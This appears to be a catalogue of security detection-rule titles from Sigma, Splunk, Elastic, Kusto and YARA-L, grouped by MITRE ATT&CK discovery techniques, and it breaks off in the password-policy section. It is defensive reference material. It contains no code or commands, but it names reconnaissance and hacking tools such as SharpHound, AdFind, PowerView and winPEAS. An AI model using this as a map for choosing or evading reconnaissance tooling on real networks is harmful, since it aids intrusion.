- Sigma Suspicious anonymous login (domain specified) experimental
- Splunk Windows PsTools Recon Usage production
System Network Connections Discovery T1049 22 rules
- Splunk Common Recon Commands in Short Burst (Sysmon)
- Splunk Common Recon Commands in Short Burst (Windows Event Log)
- Elastic Enumeration Command Spawned via WMIPrvSE production
- Splunk GetNetTcpconnection with PowerShell production
- Splunk GetNetTcpconnection with PowerShell Script Block production
- Sigma HackTool - SharpView Execution test
- Sigma Net.EXE Execution test
- Splunk Network Connection Discovery With Arp production
- Splunk Network Connection Discovery With Netstat production
- Sigma Potential Pikabot Discovery Activity test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk PowerView_SharpView Commands (PowerShell)
- Elastic Suspicious JetBrains TeamCity Child Process production
- Elastic Suspicious MS Office Child Process production
- Splunk System Network Connections Discovery - Windows (PowerShell)
- Splunk System Network Connections Discovery - Windows (Sysmon)
- Splunk System Network Connections Discovery - Windows (Windows Event Log)
- Sigma System Network Connections Discovery Via Net.EXE test
- Sigma Use Get-NetTCPConnection test
- Sigma Use Get-NetTCPConnection - PowerShell Module test
- Splunk Windows Network Connection Discovery Via Net production
- Splunk Windows System Network Connections Discovery Netsh production
Process Discovery T1057 18 rules
- Splunk Common Recon Commands in Short Burst (Sysmon)
- Splunk Common Recon Commands in Short Burst (Windows Event Log)
- Splunk Common Reconnaissance Commands (PowerShell)
- Splunk Common Reconnaissance Commands (Sysmon)
- Splunk Common Reconnaissance Commands (Windows Event Log)
- Elastic Enumeration Command Spawned via WMIPrvSE production
- Sigma HackTool - PCHunter Execution test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Process Discovery stable
- Elastic Process Discovery Using Built-in Tools production
- Sigma Recon Command Output Piped To Findstr.EXE test
- Elastic Suspicious JetBrains TeamCity Child Process production
- Elastic Suspicious MS Office Child Process production
- Elastic Suspicious PDF Reader Child Process production
- Sigma Suspicious Process Discovery With Get-Process test
- Sigma Suspicious Tasklist Discovery Command test
- Elastic System Service Discovery through built-in Windows Utilities production
- Splunk Windows Process Commandline Discovery production
Permission Groups Discovery T1069 89 rules
- Sigma Active Directory Database Snapshot Via ADExplorer test
- Elastic Active Directory Discovery using AdExplorer production
- Sigma Active Directory Group Enumeration With Get-AdGroup test
- Sigma AD Groups Or Users Enumeration Using PowerShell - PoshModule test
- Sigma AD Groups Or Users Enumeration Using PowerShell - ScriptBlock test
- Sigma ADExplorer Writing Complete AD Snapshot Into .dat File experimental
- Elastic AdFind Command Activity production
- Splunk Adfind Commands (PowerShell)
- Splunk Adfind Commands (Sysmon)
- Splunk Adfind Commands (Windows Event Log)
- Splunk Adfind Execution (EDR)
- Splunk Adfind Execution (PowerShell)
- Splunk Adfind Execution (Sysmon)
- Splunk Adfind Execution (Windows Event Log)
- Sigma BloodHound Collection Files test
- Splunk Detect AzureHound Command-Line Arguments production
- Splunk Detect AzureHound File Modifications production
- Splunk Detect SharpHound Command-Line Arguments production
- Splunk Detect SharpHound File Modifications production
- Splunk Detect SharpHound Usage production
- Splunk Domain Group Discovery with Adsisearcher production
- Splunk Domain Group Discovery With Dsquery production
- Splunk Domain Group Discovery With Wmic production
- Sigma Domain group enumeration experimental
- Splunk Elevated Group Discovery with PowerView production
- Splunk Elevated Group Discovery With Wmic production
- Elastic Enumeration of Administrator Accounts production
- Splunk Get WMIObject Group Discovery production
- Splunk Get WMIObject Group Discovery with Script Block Logging production
- Splunk GetAdGroup with PowerShell production
- Splunk GetAdGroup with PowerShell Script Block production
- Splunk GetDomainGroup with PowerShell production
- Splunk GetDomainGroup with PowerShell Script Block production
- Splunk GetWmiObject Ds Group with PowerShell production
- Splunk GetWmiObject Ds Group with PowerShell Script Block production
- Sigma Group discovery (command)
- Sigma Group discovery (PowerShell)
- Sigma HackTool - Bloodhound/Sharphound Execution test
- Sigma HackTool - SharpView Execution test
- Splunk IcedID Discovery Commands (EDR)
- Splunk IcedID Discovery Commands (Sysmon)
- Splunk IcedID Discovery Commands (Windows Event Log)
- Kusto LDAP reconnaissance via search filters
- Sigma Local domain group enumeration experimental
- Sigma Local group enumeration triggered by Azure Virtual machine recovery tool stable
- Sigma Local Groups Reconnaissance Via Wmic.EXE test
- Sigma Malicious PowerShell Commandlets - PoshModule test
- Sigma Malicious PowerShell Commandlets - ProcessCreation test
- Sigma Malicious PowerShell Commandlets - ScriptBlock test
- Sigma Net.EXE Execution test
- Splunk Network Traffic to Active Directory Web Services Protocol production
- Sigma Permission Check Via Accesschk.EXE test
- Splunk Permission Groups Discovery: Domain Groups (PowerShell)
- Splunk Permission Groups Discovery: Domain Groups (Sysmon)
- Splunk Permission Groups Discovery: Domain Groups (Windows Event Log)
- Splunk Permission Groups Discovery: Local Groups (PowerShell)
- Splunk Permission Groups Discovery: Local Groups (Sysmon)
- Splunk Permission Groups Discovery: Local Groups (Windows Event Log)
- Sigma Potential Active Directory Reconnaissance/Enumeration Via LDAP test
- Elastic Potential Enumeration via Active Directory Web Service production
- Splunk PowerShell Get LocalGroup Discovery production
- Splunk Powershell Get LocalGroup Discovery with Script Block Logging production
- Splunk PowerView_SharpView Commands (PowerShell)
- Kusto Probable AdFind Recon Tool Usage available
- Sigma PUA - AdFind Suspicious Execution test
- YARA-L Recon Environment Enumeration Active Directory CISA Report
- Sigma Reconnaissance Activity test
- Sigma Remote local admin group enumeration via SharpHound experimental
- Elastic Remote System Discovery Commands production
- Sigma Renamed AdFind Execution test
- Sigma Sensitive SAM domain user & groups discovery (native) experimental
- Splunk SharpHound Enumeration (Windows Event Log)
- Splunk SharpHound Keywords (PowerShell)
- Elastic Suspicious Access to LDAP Attributes production
- Sigma Suspicious Active Directory Database Snapshot Via ADExplorer test
- Sigma Suspicious Get Information for SMB Share test
- Sigma Suspicious Get Information for SMB Share - PowerShell Module test
- Sigma Suspicious Get Local Groups Information test
- Sigma Suspicious Get Local Groups Information - PowerShell test
- Elastic Whoami Process Activity production
- Elastic Windows Account or Group Discovery production
- Splunk Windows Admin Permission Discovery production
- Splunk Windows Azure PowerShell Module Installation Via PowerShell Script production
- Splunk Windows Group Discovery Via Net production
- Splunk Windows Ldifde Directory Object Behavior production
- Splunk Windows PowerView AD Access Control List Enumeration production
- Splunk Windows Sensitive Group Discovery With Net production
- Splunk Windows SOAPHound Binary Execution production
- Splunk Wmic Group Discovery production
Permission Groups Discovery: Local Groups T1069.001 37 rules
- Sigma AD Groups Or Users Enumeration Using PowerShell - PoshModule test
- Sigma AD Groups Or Users Enumeration Using PowerShell - ScriptBlock test
- Sigma BloodHound Collection Files test
- Splunk Detect AzureHound Command-Line Arguments production
- Splunk Detect AzureHound File Modifications production
- Splunk Detect SharpHound Command-Line Arguments production
- Splunk Detect SharpHound File Modifications production
- Splunk Detect SharpHound Usage production
- Elastic Enumeration of Administrator Accounts production
- Splunk Get WMIObject Group Discovery production
- Splunk Get WMIObject Group Discovery with Script Block Logging production
- Sigma Group discovery (command)
- Sigma Group discovery (PowerShell)
- Sigma HackTool - Bloodhound/Sharphound Execution test
- Sigma Local domain group enumeration experimental
- Sigma Local group enumeration triggered by Azure Virtual machine recovery tool stable
- Sigma Local Groups Reconnaissance Via Wmic.EXE test
- Sigma Malicious PowerShell Commandlets - PoshModule test
- Sigma Malicious PowerShell Commandlets - ProcessCreation test
- Sigma Malicious PowerShell Commandlets - ScriptBlock test
- Sigma Net.EXE Execution test
- Splunk Network Traffic to Active Directory Web Services Protocol production
- Sigma Permission Check Via Accesschk.EXE test
- Splunk PowerShell Get LocalGroup Discovery production
- Splunk Powershell Get LocalGroup Discovery with Script Block Logging production
- Sigma Remote local admin group enumeration via SharpHound experimental
- Splunk SharpHound Enumeration (Windows Event Log)
- Splunk SharpHound Keywords (PowerShell)
- Sigma Suspicious Get Information for SMB Share test
- Sigma Suspicious Get Information for SMB Share - PowerShell Module test
- Sigma Suspicious Get Local Groups Information test
- Sigma Suspicious Get Local Groups Information - PowerShell test
- Elastic Windows Account or Group Discovery production
- Splunk Windows Admin Permission Discovery production
- Splunk Windows Group Discovery Via Net production
- Splunk Windows SOAPHound Binary Execution production
- Splunk Wmic Group Discovery production
Permission Groups Discovery: Domain Groups T1069.002 66 rules
- Sigma Active Directory Database Snapshot Via ADExplorer test
- Elastic Active Directory Discovery using AdExplorer production
- Sigma Active Directory Group Enumeration With Get-AdGroup test
- Sigma ADExplorer Writing Complete AD Snapshot Into .dat File experimental
- Elastic AdFind Command Activity production
- Splunk Adfind Commands (PowerShell)
- Splunk Adfind Commands (Sysmon)
- Splunk Adfind Commands (Windows Event Log)
- Splunk Adfind Execution (EDR)
- Splunk Adfind Execution (PowerShell)
- Splunk Adfind Execution (Sysmon)
- Splunk Adfind Execution (Windows Event Log)
- Sigma BloodHound Collection Files test
- Splunk Detect AzureHound Command-Line Arguments production
- Splunk Detect AzureHound File Modifications production
- Splunk Detect SharpHound Command-Line Arguments production
- Splunk Detect SharpHound File Modifications production
- Splunk Detect SharpHound Usage production
- Splunk Domain Group Discovery with Adsisearcher production
- Splunk Domain Group Discovery With Dsquery production
- Splunk Domain Group Discovery With Wmic production
- Sigma Domain group enumeration experimental
- Splunk Elevated Group Discovery with PowerView production
- Splunk Elevated Group Discovery With Wmic production
- Elastic Enumeration of Administrator Accounts production
- Splunk GetAdGroup with PowerShell production
- Splunk GetAdGroup with PowerShell Script Block production
- Splunk GetDomainGroup with PowerShell production
- Splunk GetDomainGroup with PowerShell Script Block production
- Splunk GetWmiObject Ds Group with PowerShell production
- Splunk GetWmiObject Ds Group with PowerShell Script Block production
- Sigma Group discovery (command)
- Sigma Group discovery (PowerShell)
- Sigma HackTool - Bloodhound/Sharphound Execution test
- Sigma HackTool - SharpView Execution test
- Splunk IcedID Discovery Commands (EDR)
- Splunk IcedID Discovery Commands (Sysmon)
- Splunk IcedID Discovery Commands (Windows Event Log)
- Kusto LDAP reconnaissance via search filters
- Sigma Malicious PowerShell Commandlets - PoshModule test
- Sigma Malicious PowerShell Commandlets - ProcessCreation test
- Sigma Malicious PowerShell Commandlets - ScriptBlock test
- Sigma Net.EXE Execution test
- Splunk Network Traffic to Active Directory Web Services Protocol production
- Splunk Permission Groups Discovery: Domain Groups (PowerShell)
- Splunk Permission Groups Discovery: Domain Groups (Sysmon)
- Splunk Permission Groups Discovery: Domain Groups (Windows Event Log)
- Sigma Potential Active Directory Reconnaissance/Enumeration Via LDAP test
- Elastic Potential Enumeration via Active Directory Web Service production
- Splunk PowerView_SharpView Commands (PowerShell)
- Kusto Probable AdFind Recon Tool Usage available
- Sigma PUA - AdFind Suspicious Execution test
- YARA-L Recon Environment Enumeration Active Directory CISA Report
- Sigma Reconnaissance Activity test
- Elastic Remote System Discovery Commands production
- Sigma Renamed AdFind Execution test
- Sigma Sensitive SAM domain user & groups discovery (native) experimental
- Splunk SharpHound Enumeration (Windows Event Log)
- Splunk SharpHound Keywords (PowerShell)
- Elastic Suspicious Access to LDAP Attributes production
- Sigma Suspicious Active Directory Database Snapshot Via ADExplorer test
- Elastic Windows Account or Group Discovery production
- Splunk Windows Group Discovery Via Net production
- Splunk Windows Ldifde Directory Object Behavior production
- Splunk Windows Sensitive Group Discovery With Net production
- Splunk Windows SOAPHound Binary Execution production
Permission Groups Discovery: Cloud Groups T1069.003 1 rule
- Splunk Windows Azure PowerShell Module Installation Via PowerShell Script production
System Information Discovery T1082 64 rules
- Sigma Audit policy enumerated experimental
- Sigma CMD Shell Output Redirect test
- Splunk Common Recon Commands in Short Burst (Sysmon)
- Splunk Common Recon Commands in Short Burst (Windows Event Log)
- Splunk Common Reconnaissance Commands (PowerShell)
- Splunk Common Reconnaissance Commands (Sysmon)
- Splunk Common Reconnaissance Commands (Windows Event Log)
- Kusto Detect Suspicious Commands Initiated by Webserver Processes available
- Elastic Enumeration Command Spawned via WMIPrvSE production
- Splunk Event Logs Queried for RDP Sessions (PowerShell)
- Splunk Event Logs Queried for RDP Sessions (Sysmon)
- Splunk Event Logs Queried for RDP Sessions (Windows Event Log)
- Sigma HackTool - PCHunter Execution test
- Sigma HackTool - winPEAS Execution test
- YARA-L Hacktool - WinPEAS Execution Patterns
- Sigma HackTool - WinPwn Execution test
- Sigma HackTool - WinPwn Execution - ScriptBlock test
- Splunk IcedID Discovery Commands (EDR)
- Splunk IcedID Discovery Commands (Sysmon)
- Splunk IcedID Discovery Commands (Windows Event Log)
- Sigma Network Reconnaissance Activity test
- Splunk Potential PowerShell Post-Exploitation Activity (Sysmon)
- Splunk Potential PowerShell Post-Exploitation Activity (Windows Event Log)
- Sigma Potential Product Class Reconnaissance Via Wmic.EXE test
- Sigma Potential Suspicious Activity Using SeCEdit test
- Splunk Potential Target Discovery via PowerShell Event Log Queries (PowerShell)
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma PUA - System Informer Execution test
- YARA-L Recon Environment Enumeration System CISA Report
- Splunk SharpHound Enumeration (Windows Event Log)
- Splunk SharpHound Keywords (PowerShell)
- Sigma Suspicious Execution of Hostname test
- Sigma Suspicious Execution of Systeminfo test
- Elastic Suspicious JetBrains TeamCity Child Process production
- Sigma Suspicious Kernel Dump Using Dtrace test
- Elastic Suspicious MS Office Child Process production
- Elastic Suspicious PDF Reader Child Process production
- Sigma Suspicious Query of MachineGUID test
- Sigma System Disk And Volume Reconnaissance Via Wmic.EXE test
- Splunk System Enumeration with WMIC (Sysmon)
- Splunk System Enumeration with WMIC (Windows Event Log)
- Splunk System Information Discovery - Windows (PowerShell)
- Splunk System Information Discovery - Windows (Sysmon)
- Splunk System Information Discovery - Windows (Windows Event Log)
- Splunk System Information Discovery Detection production
- Sigma System Information Discovery via Registry Queries experimental
- Elastic System Information Discovery via Windows Command Shell production
- Sigma System Information Discovery Via Wmic.EXE test
- Sigma Uncommon System Information Discovery Via Wmic.EXE test
- Splunk Web Servers Executing Suspicious Processes experimental
- Splunk Windows Information Discovery Fsutil production
- Splunk Windows PowerShell Invoke-RestMethod IP Information Collection production
- Splunk Windows PsTools Recon Usage production
- Elastic Windows System Information Discovery production
- Splunk Windows WinPEAS PowerShell Script Execution production
- Splunk Windows Wmic CPU Discovery production
- Splunk Windows Wmic DiskDrive Discovery production
- Splunk Windows Wmic Memory Chip Discovery production
- Splunk Windows Wmic Network Discovery production
- Splunk Windows Wmic Systeminfo Discovery production
- Elastic Wireless Credential Dumping using Netsh Command production
- Splunk WMIC Host Reconniassance (PowerShell)
- Splunk WMIC Host Reconniassance (Sysmon)
- Splunk WMIC Host Reconniassance (Windows Event Log)
File and Directory Discovery T1083 17 rules
- Sigma DirLister Execution test
- Splunk File and Directory Discovery Output to File - Windows (PowerShell)
- Splunk File and Directory Discovery Output to File - Windows (Sysmon)
- Splunk File and Directory Discovery Output to File - Windows (Windows Event Log)
- Sigma HackTool - PCHunter Execution test
- Sigma Notepad Password Files Discovery experimental
- Sigma Powershell Directory Enumeration test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Powershell Sensitive File Discovery test
- Sigma PUA - Seatbelt Execution test
- Sigma PUA - TruffleHog Execution experimental
- Splunk Remote Share Directory Listing - Windows (PowerShell)
- Splunk Remote Share Directory Listing - Windows (Sysmon)
- Splunk Remote Share Directory Listing - Windows (Windows Event Log)
- Elastic System Information Discovery via Windows Command Shell production
- Sigma Turla Group Lateral Movement test
- Sigma WannaCry Ransomware Activity test
Account Discovery T1087 132 rules
- Elastic Account Discovery Command via SYSTEM Account production
- Sigma Active Directory Computers Enumeration With Get-AdComputer test
- Sigma Active Directory Database Snapshot Via ADExplorer test
- Elastic Active Directory Discovery using AdExplorer production
- Sigma Active Directory honeypot enumerated by a suspicious host (Bloodhound) experimental
- Sigma Active Directory Structure Export Via Csvde.EXE test
- Sigma AD Privileged Users or Groups Reconnaissance test
- Sigma ADExplorer Writing Complete AD Snapshot Into .dat File experimental
- Elastic AdFind Command Activity production
- Splunk Adfind Commands (PowerShell)
- Splunk Adfind Commands (Sysmon)
- Splunk Adfind Commands (Windows Event Log)
- Splunk Adfind Execution (EDR)
- Splunk Adfind Execution (PowerShell)
- Splunk Adfind Execution (Sysmon)
- Splunk Adfind Execution (Windows Event Log)
- Splunk AdsiSearcher Account Discovery production
- Kusto ADWS Connection from Process Injection Target
- Kusto ADWS Connection from Unexpected Binary
- Sigma BloodHound Collection Files test
- Sigma Chopper Webshell Process Pattern test
- Splunk Common Active Directory Commands (PowerShell)
- Splunk Common Active Directory Commands (Sysmon)
- Splunk Common Active Directory Commands (Windows Event Log)
- Splunk Common Exchange Recon cmdlets (PowerShell)
- Splunk Common Recon Commands in Short Burst (Sysmon)
- Splunk Common Recon Commands in Short Burst (Windows Event Log)
- Splunk Common Reconnaissance Commands (PowerShell)
- Splunk Common Reconnaissance Commands (Sysmon)
- Splunk Common Reconnaissance Commands (Windows Event Log)
- Splunk CSVDE Export Active Directory (PowerShell)
- Splunk CSVDE Export Active Directory (Sysmon)
- Splunk CSVDE Export Active Directory (Windows Event Log)
- Splunk Detect AzureHound Command-Line Arguments production
- Splunk Detect AzureHound File Modifications production
- Splunk Detect SharpHound Command-Line Arguments production
- Splunk Detect SharpHound File Modifications production
- Splunk Detect SharpHound Usage production
- Kusto Detect Suspicious Commands Initiated by Webserver Processes available
- Splunk Disabled Pre-Authentication Accounts Discovery - PowerShell (PowerShell)
- Splunk Disabled Pre-Authentication Accounts Discovery - PowerShell (Sysmon)
- Splunk Disabled Pre-Authentication Accounts Discovery - PowerShell (Windows Event Log)
- Splunk Domain Account Discovery with Dsquery production
- Splunk Domain Account Discovery with Wmic production
- Sigma Domain group enumeration experimental
- Splunk Enumerate Users Local Group Using Telegram production
- Elastic Enumeration Command Spawned via WMIPrvSE production
- Elastic Enumeration of Administrator Accounts production
- Splunk Get ADUser with PowerShell production
- Splunk Get ADUser with PowerShell Script Block production
- Splunk Get DomainUser with PowerShell production
- Splunk Get DomainUser with PowerShell Script Block production
- Splunk GetLocalUser with PowerShell production
- Splunk GetLocalUser with PowerShell Script Block production
- Splunk GetWmiObject DS User with PowerShell production
- Splunk GetWmiObject DS User with PowerShell Script Block production
- Splunk GetWmiObject User Account with PowerShell production
- Splunk GetWmiObject User Account with PowerShell Script Block production
- Sigma Group discovery (command)
- Sigma HackTool - Bloodhound/Sharphound Execution test
- Sigma HackTool - SOAPHound Execution test
- Sigma HackTool - winPEAS Execution test
- Sigma Hacktool Ruler test
- Splunk IcedID Discovery Commands (EDR)
- Splunk IcedID Discovery Commands (Sysmon)
- Splunk IcedID Discovery Commands (Windows Event Log)
- Kusto Large number of AD objects accessed by user
- Kusto LDAP reconnaissance via search filters
- Splunk Local Account Discovery With Wmic production
- Sigma Local Accounts Discovery test
- Sigma Local domain group enumeration experimental
- Sigma Malicious PowerShell Commandlets - PoshModule test
- Sigma Malicious PowerShell Commandlets - ProcessCreation test
- Sigma Malicious PowerShell Commandlets - ScriptBlock test
- Elastic Mounting Hidden or WebDav Remote Shares production
- Sigma Net.EXE Execution test
- Sigma Network Reconnaissance Activity test
- Splunk Network Traffic to Active Directory Web Services Protocol production
- Sigma Potential Active Directory Reconnaissance/Enumeration Via LDAP test
- Sigma Potential AD User Enumeration From Non-Machine Account test
- Elastic Potential Enumeration via Active Directory Web Service production
- Sigma Potential Pikabot Discovery Activity test
- Splunk Potential PowerShell Post-Exploitation Activity (Sysmon)
- Splunk Potential PowerShell Post-Exploitation Activity (Windows Event Log)
- Sigma Potentially Suspicious EventLog Recon Activity Using Log Query Utilities test
- Splunk PowerHuntShares Commands (PowerShell)
- Splunk PowerHuntShares Commands (Sysmon)
- Splunk PowerHuntShares Commands (Windows Event Log)
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Kusto Probable AdFind Recon Tool Usage available
- Sigma PUA - AdFind Suspicious Execution test
- Sigma PUA - AdFind.EXE Execution experimental
- Sigma PUA - Seatbelt Execution test
- Sigma PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE test
- YARA-L Purple Knight Tool Execution Detected
- Sigma Reconnaissance Activity test
- Sigma Renamed AdFind Execution test
- Splunk SchCache Change By App Connect And Create ADSI Object production
- Splunk SharpHound Enumeration (Windows Event Log)
- Splunk SharpHound Keywords (PowerShell)
- Elastic Suspicious Access to LDAP Attributes production
- Sigma Suspicious Active Directory Database Snapshot Via ADExplorer test
- Sigma Suspicious Group And Account Reconnaissance Activity Using Net.EXE test
- Elastic Suspicious JetBrains TeamCity Child Process production
- Sigma Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet test
- Sigma Suspicious SPN enumeration previous to Kerberoasting attack (native commands) experimental
- Sigma Suspicious SPN enumeration previous to Kerberoasting attack (PowerShell) experimental
- Sigma Suspicious Use of PsLogList test
- Sigma Uncommon Connection to Active Directory Web Services test
- Sigma User properties enumeration via commandline
- Splunk User_Domain Enumeration Tool - Windows (PowerShell)
- Splunk User_Domain Enumeration Tool - Windows (Sysmon)
- Splunk User_Domain Enumeration Tool - Windows (Windows Event Log)
- Sigma Webshell Detection With Command Line Keywords test
- Sigma Webshell Hacking Activity Patterns test
- Splunk Windows Account Discovery for None Disable User Account production
- Splunk Windows Account Discovery for Sam Account Name production
- Splunk Windows Account Discovery With NetUser PreauthNotRequire production
- Elastic Windows Account or Group Discovery production
- Splunk Windows AD Abnormal Object Access Activity production
- Splunk Windows AD Privileged Object Access Activity production
- Splunk Windows Domain Account Discovery Via Get-NetComputer production
- Splunk Windows Find Domain Organizational Units with GetDomainOU production
- Splunk Windows Find Interesting ACL with FindInterestingDomainAcl production
- Splunk Windows Forest Discovery with GetForestDomain production
- Splunk Windows Get Local Admin with FindLocalAdminAccess production
- Splunk Windows Linked Policies In ADSI Discovery production
- Splunk Windows Root Domain linked policies Discovery production
- Splunk Windows SOAPHound Binary Execution production
- Splunk Windows Special Privileged Logon On Multiple Hosts production
- Splunk Windows Suspect Process With Authentication Traffic production
- Splunk Windows User Discovery Via Net production
Account Discovery: Local Account T1087.001 38 rules
- Sigma BloodHound Collection Files test
- Splunk Common Reconnaissance Commands (PowerShell)
- Splunk Common Reconnaissance Commands (Sysmon)
- Splunk Common Reconnaissance Commands (Windows Event Log)
- Splunk CSVDE Export Active Directory (PowerShell)
- Splunk CSVDE Export Active Directory (Sysmon)
- Splunk CSVDE Export Active Directory (Windows Event Log)
- Splunk Detect AzureHound Command-Line Arguments production
- Splunk Detect AzureHound File Modifications production
- Splunk Detect SharpHound Command-Line Arguments production
- Splunk Detect SharpHound File Modifications production
- Splunk Detect SharpHound Usage production
- Elastic Enumeration of Administrator Accounts production
- Splunk GetLocalUser with PowerShell production
- Splunk GetLocalUser with PowerShell Script Block production
- Splunk GetWmiObject User Account with PowerShell production
- Splunk GetWmiObject User Account with PowerShell Script Block production
- Sigma HackTool - Bloodhound/Sharphound Execution test
- Splunk Local Account Discovery With Wmic production
- Sigma Local Accounts Discovery test
- Sigma Local domain group enumeration experimental
- Sigma Malicious PowerShell Commandlets - PoshModule test
- Sigma Malicious PowerShell Commandlets - ProcessCreation test
- Sigma Malicious PowerShell Commandlets - ScriptBlock test
- Elastic Mounting Hidden or WebDav Remote Shares production
- Sigma Net.EXE Execution test
- Splunk Network Traffic to Active Directory Web Services Protocol production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk SharpHound Enumeration (Windows Event Log)
- Splunk SharpHound Keywords (PowerShell)
- Sigma Suspicious Group And Account Reconnaissance Activity Using Net.EXE test
- Sigma Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet test
- Sigma Suspicious Use of PsLogList test
- Sigma User properties enumeration via commandline
- Splunk Windows Account Discovery for None Disable User Account production
- Elastic Windows Account or Group Discovery production
- Splunk Windows SOAPHound Binary Execution production
- Splunk Windows User Discovery Via Net production
Account Discovery: Domain Account T1087.002 84 rules
- Sigma Active Directory Computers Enumeration With Get-AdComputer test
- Sigma Active Directory Database Snapshot Via ADExplorer test
- Elastic Active Directory Discovery using AdExplorer production
- Sigma Active Directory Structure Export Via Csvde.EXE test
- Sigma AD Privileged Users or Groups Reconnaissance test
- Sigma ADExplorer Writing Complete AD Snapshot Into .dat File experimental
- Elastic AdFind Command Activity production
- Splunk Adfind Commands (PowerShell)
- Splunk Adfind Commands (Sysmon)
- Splunk Adfind Commands (Windows Event Log)
- Splunk Adfind Execution (EDR)
- Splunk Adfind Execution (PowerShell)
- Splunk Adfind Execution (Sysmon)
- Splunk Adfind Execution (Windows Event Log)
- Splunk AdsiSearcher Account Discovery production
- Kusto ADWS Connection from Process Injection Target
- Kusto ADWS Connection from Unexpected Binary
- Sigma BloodHound Collection Files test
- Splunk Common Active Directory Commands (PowerShell)
- Splunk Common Active Directory Commands (Sysmon)
- Splunk Common Active Directory Commands (Windows Event Log)
- Splunk CSVDE Export Active Directory (PowerShell)
- Splunk CSVDE Export Active Directory (Sysmon)
- Splunk CSVDE Export Active Directory (Windows Event Log)
- Splunk Detect AzureHound Command-Line Arguments production
- Splunk Detect AzureHound File Modifications production
- Splunk Detect SharpHound Command-Line Arguments production
- Splunk Detect SharpHound File Modifications production
- Splunk Detect SharpHound Usage production
- Splunk Domain Account Discovery with Dsquery production
- Splunk Domain Account Discovery with Wmic production
- Sigma Domain group enumeration experimental
- Elastic Enumeration of Administrator Accounts production
- Splunk Get ADUser with PowerShell production
- Splunk Get ADUser with PowerShell Script Block production
- Splunk Get DomainUser with PowerShell production
- Splunk Get DomainUser with PowerShell Script Block production
- Splunk GetWmiObject DS User with PowerShell production
- Splunk GetWmiObject DS User with PowerShell Script Block production
- Sigma Group discovery (command)
- Sigma HackTool - Bloodhound/Sharphound Execution test
- Kusto Large number of AD objects accessed by user
- Kusto LDAP reconnaissance via search filters
- Sigma Malicious PowerShell Commandlets - PoshModule test
- Sigma Malicious PowerShell Commandlets - ProcessCreation test
- Sigma Malicious PowerShell Commandlets - ScriptBlock test
- Elastic Mounting Hidden or WebDav Remote Shares production
- Sigma Net.EXE Execution test
- Splunk Network Traffic to Active Directory Web Services Protocol production
- Sigma Potential Active Directory Reconnaissance/Enumeration Via LDAP test
- Sigma Potential AD User Enumeration From Non-Machine Account test
- Elastic Potential Enumeration via Active Directory Web Service production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Kusto Probable AdFind Recon Tool Usage available
- Sigma PUA - AdFind Suspicious Execution test
- Sigma PUA - AdFind.EXE Execution experimental
- Sigma PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE test
- Sigma Reconnaissance Activity test
- Sigma Renamed AdFind Execution test
- Splunk SchCache Change By App Connect And Create ADSI Object production
- Splunk SharpHound Enumeration (Windows Event Log)
- Splunk SharpHound Keywords (PowerShell)
- Elastic Suspicious Access to LDAP Attributes production
- Sigma Suspicious Active Directory Database Snapshot Via ADExplorer test
- Sigma Suspicious Group And Account Reconnaissance Activity Using Net.EXE test
- Sigma Suspicious SPN enumeration previous to Kerberoasting attack (native commands) experimental
- Sigma Suspicious SPN enumeration previous to Kerberoasting attack (PowerShell) experimental
- Sigma Suspicious Use of PsLogList test
- Sigma User properties enumeration via commandline
- Splunk User_Domain Enumeration Tool - Windows (PowerShell)
- Splunk User_Domain Enumeration Tool - Windows (Sysmon)
- Splunk User_Domain Enumeration Tool - Windows (Windows Event Log)
- Elastic Windows Account or Group Discovery production
- Splunk Windows AD Abnormal Object Access Activity production
- Splunk Windows AD Privileged Object Access Activity production
- Splunk Windows Domain Account Discovery Via Get-NetComputer production
- Splunk Windows Find Domain Organizational Units with GetDomainOU production
- Splunk Windows Find Interesting ACL with FindInterestingDomainAcl production
- Splunk Windows Forest Discovery with GetForestDomain production
- Splunk Windows Get Local Admin with FindLocalAdminAccess production
- Splunk Windows Linked Policies In ADSI Discovery production
- Splunk Windows Root Domain linked policies Discovery production
- Splunk Windows SOAPHound Binary Execution production
- Splunk Windows Suspect Process With Authentication Traffic production
Peripheral Device Discovery T1120 5 rules
- Sigma Fsutil Drive Enumeration test
- Splunk Fsutil fsinfo execution (EDR)
- Splunk Fsutil fsinfo execution (Windows Event Log)
- Elastic Peripheral Device Discovery production
- Sigma Powershell Suspicious Win32_PnPEntity test
System Time Discovery T1124 5 rules
- Sigma Discovery of a System Time test
- Elastic System Time Discovery production
- Splunk System Time enumeration (Windows Event Log)
- Sigma Use of W32tm as Timer test
- Splunk Windows System Time Discovery W32tm Delay production
Network Share Discovery T1135 28 rules
- Splunk Advanced IP or Port Scanner Execution production
- Kusto Excessive share permissions available
- Sigma File Explorer Folder Opened Using Explorer Folder Shortcut Via Shell test
- Sigma HackTool - SharpView Execution test
- Splunk IcedID Discovery Commands (EDR)
- Splunk IcedID Discovery Commands (Sysmon)
- Splunk IcedID Discovery Commands (Windows Event Log)
- Sigma Net.EXE Execution test
- Sigma Network share discovery and/or connection via commandline
- Splunk Network Share Discovery Via Dir Command production
- Sigma Potential Dridex Activity stable
- Elastic Potential Network Share Discovery production
- Splunk PowerHuntShares Commands (PowerShell)
- Splunk PowerHuntShares Commands (Sysmon)
- Splunk PowerHuntShares Commands (Windows Event Log)
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk PowerView_SharpView Commands (PowerShell)
- Sigma PUA - Advanced IP Scanner Execution test
- Sigma PUA - Advanced Port Scanner Execution test
- Sigma SharpHound enumeration via SMB named pipes experimental
- Elastic System Service Discovery through built-in Windows Utilities production
- Sigma Turla Group Lateral Movement test
- Splunk Windows Administrative Shares Accessed On Multiple Hosts production
- Splunk Windows File Share Discovery With Powerview production
- Splunk Windows Large Number of Computer Service Tickets Requested production
- Elastic Windows Network Enumeration production
- Splunk Windows Network Share Interaction Via Net production
- Splunk Windows Special Privileged Logon On Multiple Hosts production
Password Policy Discovery T1201 17 rules
- Sigma Domain password policy enumeration experimental
